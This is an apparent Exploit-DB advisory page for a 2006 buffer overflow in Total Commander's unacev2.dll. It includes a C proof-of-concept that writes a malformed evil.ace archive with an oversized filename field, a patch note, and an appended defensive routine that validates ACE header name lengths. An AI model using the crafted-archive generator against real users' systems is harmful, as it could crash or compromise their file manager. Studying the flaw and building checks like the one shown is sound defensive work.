Vendor: Total Commander
By: Darkeagle of Unl0ck Research Team
CVSS: 7,5 (HIGH)
Buffer Overflow
CWE: 120 (Buffer Copy without Checking Size of Input)
Product Name: Total Commander
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Total Commander unacev2.dll Buffer Overflow PoC Exploit

This is a proof-of-concept exploit for a buffer overflow vulnerability in Total Commander's unacev2.dll. It is written in C and contains an array of malicious data that it writes to a file called evil.ace. Once the file has been created, the user opens the archive in Total Commander and then unpacks it.

Mitigation:

The user should update to the latest version of Total Commander to ensure that the vulnerability is patched.

Exploit-DB raw data:

/*
--
/\
\/	Total Commander unacev2.dll Buffer Overflow PoC Exploit
/\			by Darkeagle of Unl0ck Research Team
\/					http://unl0ck.net
/\	
\/	when file will be created, try to open archive in TotalCmd and then unpack it ;)
/\
\/
--
*/
#include <string.h>
#include <stdio.h>

unsigned char evil_ace[] = 
	"\x29\x8F\x31\x00\x00\x00\x90\x2A\x2A\x41\x43\x45\x2A\x2A\x14\x14" 
	"\x02\x00\x79\xB5\x7F\x34\xFE\xE2\x05\xA5\x00\x00\x00\x00\x16\x2A" 
	"\x55\x4E\x52\x45\x47\x49\x53\x54\x45\x52\x45\x44\x20\x56\x45\x52" 
	"\x53\x49\x4F\x4E\x2A\x7F\x30\x1E\x01\x01\x01\x00\x00\x00\x00\x00" 
	"\x00\x00\x00\x00\x75\xB5\x7F\x34\x20\x00\x00\x00\xFF\xFF\xFF\xFF" 
	"\x00\x03\x0A\x00\x54\x45\xFF\x00\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61\x61" 
	"\x61\x61\x61\x2E\x74\x78\x74";


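int main(void)
{
	/* Write the embedded archive bytes (minus the literal's trailing NUL) to evil.ace. */
	FILE *ace = fopen("evil.ace", "w+b");
	if (ace == NULL) {
		perror("evil.ace");
		return 1;
	}
	fwrite(evil_ace, 1, sizeof(evil_ace)-1, ace);
	fclose(ace);
	return 0;
}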

// milw0rm.com [2006-04-02]
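
Added example (not part of the original PoC and not Total Commander's code): a pre-extraction check that walks an ACE header chain and rejects file headers whose declared name length exceeds a caller-chosen limit or overruns the header, the kind of size check CWE-120 is about. Field offsets follow the publicly documented ACE header layout; in the array above, the file header begins at offset 53 and its name-length field reads 0x00FF. The names `ace_check_names` and `ace_sample` and the limit value are assumptions made for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#define ACE_FILE_FIXED 31  /* file-header bytes from HEAD_TYPE up to the name */

static uint32_t le(const uint8_t *p, int n)   /* little-endian read of n bytes */
{
    uint32_t v = 0; while (n--) v = (v << 8) | p[n]; return v;
}

/* 0: all names within limit; 1: a name exceeds limit; -1: malformed chain.
   limit is the caller's policy value, not a figure taken from the page. */
int ace_check_names(const uint8_t *buf, size_t len, size_t limit)
{
    size_t off = 0;
    if (len < 14 || memcmp(buf + 7, "**ACE**", 7) != 0) return -1;
    while (off < len) {
        if (len - off < 7) return -1;
        size_t hsize = le(buf + off + 2, 2);      /* bytes after HEAD_SIZE */
        size_t add = 0;
        if (hsize < 3 || hsize > len - off - 4) return -1;
        if (buf[off + 4] == 1) {                  /* HEAD_TYPE 1 = file header */
            if (hsize < ACE_FILE_FIXED) return -1;
            size_t nlen = le(buf + off + 33, 2);  /* FNAME_SIZE */
            if (nlen > hsize - ACE_FILE_FIXED) return -1; /* name overruns header */
            if (nlen > limit) return 1;
        }
        if (le(buf + off + 5, 2) & 1) {           /* ADDSIZE: data follows header */
            if (hsize < 7) return -1;
            add = le(buf + off + 7, 4);
        }
        off += 4 + hsize;
        if (add > len - off) return -1;
        off += add;
    }
    return 0;
}

/* Constructed sample: stub main header plus one file header with a name of
   name_len 'a' bytes. CRCs stay zero (unchecked here); out needs 49 + name_len. */
size_t ace_sample(uint8_t *out, uint16_t name_len)
{
    size_t h = ACE_FILE_FIXED + name_len;
    memset(out, 0, 18 + h);
    out[2] = 10; memcpy(out + 7, "**ACE**", 7);
    out[16] = (uint8_t)h; out[17] = (uint8_t)(h >> 8); out[18] = 1; out[19] = 1;
    out[47] = (uint8_t)name_len; out[48] = (uint8_t)(name_len >> 8);
    memset(out + 49, 'a', name_len);
    return 18 + h;
}
```

A return of 1 or -1 means the archive should not be handed to the extraction library.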